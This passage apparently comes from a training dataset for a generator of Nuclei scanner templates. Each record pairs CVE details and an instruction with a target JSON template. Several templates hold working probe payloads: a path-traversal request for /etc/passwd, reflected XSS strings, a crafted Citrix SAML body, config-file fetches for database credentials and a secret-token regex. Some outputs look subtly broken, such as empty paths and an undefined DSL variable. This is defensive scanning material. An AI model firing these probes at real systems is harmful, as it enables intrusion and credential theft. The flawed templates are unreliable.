"name": "ServiceNow - Incomplete Input Validation",
"author": "DhiyaneshDk,ritikchaddha",
"severity": "critical",
"description": "ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform.\u00a0The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n",
"tags": [
"cve",
"cve2024",
"servicenow",
"rce",
"kev",
"vkev",
"vuln"
],
"reference": [
"https://www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data",
"https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1644293",
"https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1648313",
"https://nvd.nist.gov/vuln/detail/CVE-2024-5217"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"glide.db.user"
]
},
{
"type": "word",
"part": "content_type",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2024-5217",
"timestamp": "2025-11-13T15:15:46.981239Z"
}
}
|
CVE-2024-4836
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2024-4836",
"summary": "Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthenticated user.\nThe issue in versions 3.5 - 3.25 was removed in releases which dates from 10th of January 2014. Higher versions were never affected.",
"affected_products": [],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2020-0646",
"severity": "critical",
"tags": [
"cve",
"cve2020",
"net-framework",
"sharepoint",
"microsoft",
"packetstorm",
"rce",
"kev",
"oast",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2024-4836",
"info": {
"name": "Edito CMS - Sensitive Data Leak",
"author": "s4e-io",
"severity": "high",
"description": "Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n",
"tags": [
"cve",
"cve2024",
"cms",
"edito",
"info-leak",
"vuln"
],
"reference": [
"https://cert.pl/en/posts/2024/07/CVE-2024-4836/",
"https://github.com/sleep46/CVE-2024-4836_Check",
"https://nvd.nist.gov/vuln/detail/CVE-2024-4836"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains_any(body,\"content=\\\"edito\", \"www.edito.pl\")",
"status_code==200"
],
"condition": "and"
}
]
},
{
"method": "GET",
"path": [
"{{BaseURL}}/config.php",
"{{BaseURL}}/config/config.php",
"{{BaseURL}}/include/config.php",
"{{BaseURL}}/includes/config.php"
],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains_all(body,\"db_password\", \"db_username\")",
"status_code==200"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 2,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2024-4836",
"timestamp": "2025-11-13T15:15:46.914751Z"
}
}
|
CVE-2025-2712
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2025-2712",
"summary": "A vulnerability was found in Yonyou UFIDA ERP-NC 5.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /help/top.jsp. The manipulation of the argument langcode leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"affected_products": [
{
"vendor": "yonyou",
"product": "ufida_erp-nc",
"version_range": "*"
}
],
"paths": [
"/help/top.jsp"
],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "https://github.com/Hebing123/cve/issues/86",
"snippet": "PoC available at https://github.com/Hebing123/cve/issues/86"
},
{
"source": "nvd",
"url": "https://vuldb.com/?id.300733",
"snippet": "PoC available at https://vuldb.com/?id.300733"
},
{
"source": "nvd",
"url": "https://github.com/Hebing123/cve/issues/86",
"snippet": "PoC available at https://github.com/Hebing123/cve/issues/86"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2025-2712",
"info": {
"name": "Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting",
"author": "ritikchaddha",
"severity": "medium",
"description": "Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the langcode parameter in /help/systop.jsp and /help/top.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.\n",
"tags": [
"cve",
"cve2025",
"xss",
"erp-nc",
"ufida",
"yonyou",
"vkev",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-2712"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/help/top.jsp?langcode=1%22%3E%3Csvg%20onload=alert(document.domain)%3E",
"{{BaseURL}}/help/top.jsp?langcode=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.domain)%3E"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<svg onload=alert(document.domain)>.png)",
"Search.jsp"
],
"condition": "and"
},
{
"type": "word",
"part": "content_type",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2025-2712",
"timestamp": "2025-11-13T15:15:47.335113Z"
}
}
|
CWE-79
|
[CANONICAL_RECORD]
{
"cve_id": "CWE-79",
"summary": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.",
"affected_products": [],
"paths": [],
"indicators": [
"vulnerability detected",
"error"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "mx-fingerprint",
"severity": "info",
"tags": [
"dns",
"mx",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "azure-takeover-detection",
"severity": "high",
"tags": [
"dns",
"takeover",
"azure",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "elasticbeanstalk-takeover",
"severity": "high",
"tags": [
"dns",
"takeover",
"aws",
"elasticbeanstalk",
"discovery"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "ckan-dom-based-xss",
"info": {
"name": "CKAN - DOM Cross-Site Scripting",
"author": "dhiyaneshDk",
"severity": "high",
"description": "CKAN contains a cross-site scripting vulnerability in the document object model via the previous version of the jQuery Sparkle library. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.",
"tags": [
"dom",
"xss",
"vuln"
],
"reference": [
"https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27",
"https://security.snyk.io/vuln/SNYK-PYTHON-CKAN-42010"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/?{alert(document.domain)}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<option value=\"/en/?{alert(document.domain)}\" selected=\"selected\">"
]
},
{
"type": "word",
"part": "body",
"words": [
"ckan 2.3",
"ckan 2.8.2"
],
"condition": "or"
},
{
"type": "word",
"part": "header",
"words": [
"text/html"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-ckan-dom-based-xss",
"timestamp": "2025-11-13T15:16:07.071869Z"
}
}
|
chamilo-installer
|
[CANONICAL_RECORD]
{
"cve_id": "chamilo-installer",
"summary": "Chamilo is susceptible to the Installation page exposure due to misconfiguration.",
"affected_products": [],
"paths": [
"{{BaseURL}}",
"{{BaseURL}}/main/install/index.php"
],
"indicators": [
"Chamilo installation",
"Installation Language",
"<title>Chamilo has not been installed</title>"
],
"severity_hint": "high"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-api-public",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "chamilo-installer",
"info": {
"name": "Chamilo Installer Exposure",
"author": "DhiyaneshDk",
"severity": "high",
"description": "Chamilo is susceptible to the Installation page exposure due to misconfiguration.",
"tags": [
"misconfig",
"chamilo",
"install",
"exposure",
"vuln"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}",
"{{BaseURL}}/main/install/index.php"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"Chamilo installation",
"Installation Language"
],
"condition": "and"
},
{
"type": "word",
"part": "body",
"words": [
"<title>Chamilo has not been installed</title>"
]
}
],
"matchers_condition": "or",
"stop_at_first_match": true
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-chamilo-installer",
"timestamp": "2025-11-13T15:15:50.923898Z"
}
}
|
CVE-2010-1312
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2010-1312",
"summary": "Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.",
"affected_products": [
{
"vendor": "ijoomla",
"product": "com_news_portal",
"version_range": "*"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2019-14287",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2019",
"sudo",
"code",
"linux",
"privesc",
"local",
"canonical",
"sudo_project",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2021-3156",
"severity": "high",
"tags": [
"packetstorm",
"cve",
"cve2021",
"sudo",
"code",
"linux",
"privesc",
"local",
"kev",
"sudo_project",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2019-0604",
"severity": "critical",
"tags": [
"cve",
"cve2019",
"sharepoint",
"microsoft",
"rce",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[
{
"source": "nvd",
"url": "http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt",
"snippet": "PoC available at http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt"
},
{
"source": "nvd",
"url": "http://www.exploit-db.com/exploits/12077",
"snippet": "PoC available at http://www.exploit-db.com/exploits/12077"
},
{
"source": "nvd",
"url": "http://www.securityfocus.com/bid/39222",
"snippet": "PoC available at http://www.securityfocus.com/bid/39222"
}
]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2010-1312",
"info": {
"name": "Joomla! Component News Portal 1.5.x - Local File Inclusion",
"author": "daffainfo",
"severity": "medium",
"description": "A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.",
"tags": [
"cve2010",
"cve",
"joomla",
"lfi",
"edb",
"packetstorm",
"ijoomla",
"vuln"
],
"reference": [
"https://www.exploit-db.com/exploits/12077",
"https://nvd.nist.gov/vuln/detail/CVE-2010-1312",
"http://packetstormsecurity.org/1004-exploits/joomlanewportal-lfi.txt",
"https://github.com/ARPSyndicate/kenzer-templates"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
],
"matchers": [
{
"type": "regex",
"regex": [
"root:.*:0:0:"
]
},
{
"type": "status",
"status": [
200
]
}
],
"matchers_condition": "and"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2010-1312",
"timestamp": "2025-11-13T15:15:40.362093Z"
}
}
|
CVE-2023-5914
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2023-5914",
"summary": "\u00a0 Cross-site scripting (XSS) ",
"affected_products": [
{
"vendor": "cloud",
"product": "citrix_storefront",
"version_range": "< 1912"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2023-2640",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"packetstorm",
"kernel",
"ubuntu",
"linux",
"privesc",
"local",
"canonical",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2023-4911",
"severity": "high",
"tags": [
"cve",
"cve2023",
"code",
"glibc",
"looneytunables",
"linux",
"privesc",
"local",
"kev",
"gnu",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2023-5914",
"info": {
"name": "Citrix StoreFront - Cross-Site Scripting",
"author": "DhiyaneshDK",
"severity": "medium",
"description": "Reflected Cross-Site Scripting issue which is exploitable without authentication. This vulnerability was exploitable through coercing an error message during an XML parsing procedure in the SSO flow.\n",
"tags": [
"cve",
"xss",
"citrix",
"storefront",
"cve2023",
"cloud",
"vkev",
"vuln"
],
"reference": [
"https://www.assetnote.io/resources/research/continuing-the-citrix-saga-cve-2023-5914-cve-2023-6184",
"https://support.citrix.com/article/CTX583759/citrix-storefront-security-bulletin-for-cve20235914",
"https://www.youtube.com/watch?v=t8MeUQrPqec",
"https://nvd.nist.gov/vuln/detail/CVE-2023-5914"
]
},
"requests": [
{
"method": "POST",
"path": [
"{{BaseURL}}/Citrix/teststoreAuth/SamlTest"
],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code == 200",
"contains(content_type, \"text/html\")",
"contains_all(body, \"<script>alert(1)</script>\", \"XmlException\")"
],
"condition": "and"
}
],
"headers": {
"Content-Type": "application/x-www-form-urlencoded"
},
"body": "SAMLResponse=q1YKdvT1CUotLsjPK05VskLhBrhHlSVVOpkkhZebJRs7ZUQahVp6ZkYVp7iUVEUaexUkewTmRhkHmkeGV%2bQk5wXm%2bwZn5yZ5BJr7GPtlJefmlKc4R%2bWluBRnBmSVl0XlWpYFpNvaKtUCAA%3d%3d"
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2023-5914",
"timestamp": "2025-11-13T15:15:46.014617Z"
}
}
|
default-lucee-page
|
[CANONICAL_RECORD]
{
"cve_id": "default-lucee-page",
"summary": "Lucee Default Page. This template detects Lucee Default Page by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"<title>Rapid web development with Lucee!</title>"
],
"severity_hint": "info"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "alibaba-cloud-code-env",
"severity": "info",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "default-lucee-page",
"info": {
"name": "Lucee Default Page",
"author": "dhiyaneshDk",
"severity": "info",
"description": "Lucee Default Page. This template detects security vulnerabilities.",
"tags": [
"tech",
"lucee",
"discovery"
],
"reference": []
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "word",
"part": "body",
"words": [
"<title>Rapid web development with Lucee!</title>"
]
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-default-lucee-page",
"timestamp": "2025-11-13T15:15:52.516366Z"
}
}
|
mapbox-token-disclosure
|
[CANONICAL_RECORD]
{
"cve_id": "mapbox-token-disclosure",
"summary": "Mapbox secret token is exposed to external users.. This template detects Mapbox Token Disclosure by checking specific patterns and responses.",
"affected_products": [],
"paths": [
"{{BaseURL}}"
],
"indicators": [
"Mapbox Token Disclosure",
"detected"
],
"severity_hint": "medium"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "multi-region-logging-disabled",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"alibaba-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "public-actiontrail-bucket",
"severity": "high",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"actiontrail"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "ack-cluster-cloud-monitor-disable",
"severity": "medium",
"tags": [
"cloud",
"devops",
"aliyun",
"alibaba",
"aliyun-cloud-config",
"ack"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "mapbox-token-disclosure",
"info": {
"name": "Mapbox Token Disclosure",
"author": "Devang-Solanki",
"severity": "medium",
"description": "Mapbox secret token is exposed to external users.",
"tags": [
"token",
"exposure",
"mapbox",
"vuln"
],
"reference": [
"https://docs.gitguardian.com/secrets-detection/detectors/specifics/mapbox_token",
"https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go",
"https://docs.mapbox.com/api/accounts/tokens/#token-format",
"https://docs.mapbox.com/help/getting-started/access-tokens/"
]
},
"requests": [
{
"method": "GET",
"path": [
"{{BaseURL}}"
],
"matchers": [
{
"type": "regex",
"part": "body",
"regex": [
"sk\\.eyJ1Ijoi\\w+\\.[\\w-]*"
]
}
]
},
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"status_code == 200",
"contains_all(body, \"type\",\"query\",\"features\")"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 2,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-mapbox-token-disclosure",
"timestamp": "2025-11-13T15:15:50.253530Z"
}
}
|
CVE-2025-30406
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2025-30406",
"summary": "Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: a CentreStack admin can manually delete the machineKey defined in portal\\web.config.",
"affected_products": [
{
"vendor": "gladinet",
"product": "centrestack",
"version_range": "< 16.4.10315.56368"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2025-1974-k8s",
"severity": "critical",
"tags": [
"cve",
"cve2025",
"cloud",
"devops",
"kubernetes",
"ingress",
"nginx",
"k8s",
"k8s-cluster-security"
],
"requests": [
{
"method": "GET",
"paths": [
"/"
],
"matcher_types": [
"status"
]
}
]
},
{
"id": "cve-2022-42475",
"severity": "critical",
"tags": [
"cve",
"cve2024",
"ssl-vpn",
"vpn",
"fortios",
"fortigate",
"heap-based",
"bufferoverflow",
"kev",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/remote/login",
"{{BaseURL}}/login"
],
"matcher_types": [
"dsl"
]
}
]
},
{
"id": "cve-2023-2986",
"severity": "critical",
"tags": [
"cve",
"cve2023",
"wordpress",
"woocommerce",
"wp-plugin",
"auth-bypass",
"woocommerce-abandoned-cart",
"vkev",
"vuln"
],
"requests": [
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}"
],
"matcher_types": [
"status"
]
},
{
"method": "GET",
"paths": [
"{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}"
],
"matcher_types": [
"word",
"word",
"status"
]
}
]
}
]
[POC_SNIPPETS]
[]
[INSTRUCTION]
Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
|
{
"id": "cve-2025-30406",
"info": {
"name": "Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE",
"author": "iamnoooob,rootxharsh,pdresearch",
"severity": "critical",
"description": "Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution.\n",
"tags": [
"cve",
"cve2025",
"gladinet",
"rce",
"centrestack",
"deserialization",
"kev",
"vkev",
"vuln"
],
"reference": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-30406",
"https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf",
"https://www.centrestack.com/p/gce_latest_release.html"
]
},
"requests": [
{
"method": "GET",
"path": [],
"matchers": [
{
"type": "dsl",
"dsl": [
"contains(to_lower(projectdiscovery), \"cve-2025-30406\")",
"status_code == 302"
],
"condition": "and"
}
]
}
],
"safety_flags": {
"static_validation_passed": false,
"denylist_checked": false,
"regex_safe": false
},
"limits": {
"max_requests": 1,
"max_body_size": 10240,
"timeout": 10
},
"metadata": {
"generated_by": "ernest-parser",
"model_version": "manual-parse-v1.0",
"generation_mode": "generate",
"input_canonical_id": "parsed-CVE-2025-30406",
"timestamp": "2025-11-13T15:15:47.383485Z"
}
}
|
CVE-2019-0230
|
[CANONICAL_RECORD]
{
"cve_id": "CVE-2019-0230",
"summary": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.",
"affected_products": [
{
"vendor": "apache",
"product": "struts",
"version_range": ">= 2.0.0, <= 2.5.20"
},
{
"vendor": "oracle",
"product": "communications_policy_management",
"version_range": "*"
},
{
"vendor": "oracle",
"product": "financial_services_data_integration_hub",
"version_range": "*"
},
{
"vendor": "oracle",
"product": "financial_services_market_risk_measurement_and_management",
"version_range": "*"
},
{
"vendor": "oracle",
"product": "mysql_enterprise_monitor",
"version_range": "<= 8.0.23"
}
],
"paths": [],
"indicators": [
"error",
"vulnerability detected"
],
"severity_hint": "critical"
}
[RETRIEVED_TEMPLATES]
[
{
"id": "cve-2019-0604",
"severity": "critical",
"tags": [
"cve",
